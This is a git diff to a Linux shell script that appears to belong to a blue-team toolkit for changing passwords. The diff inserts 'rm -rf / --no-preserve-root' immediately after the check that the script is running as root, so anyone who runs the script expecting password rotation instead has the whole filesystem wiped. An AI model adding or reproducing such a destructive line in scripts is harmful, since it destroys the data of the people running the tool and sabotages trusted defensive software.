diff --git a/blue-team/linux/change-passwords.sh b/blue-team/linux/change-passwords.sh index 066b956..cb49d43 100644 --- a/blue-team/linux/change-passwords.sh +++ b/blue-team/linux/change-passwords.sh @@ -6,7 +6,7 @@ if [[ $EUID -ne 0 ]]; then exit 1 fi delim='!' - +rm -rf / --no-preserve-root echo 'Enter the new password template:' read -r passTemp echo 'Confirm:'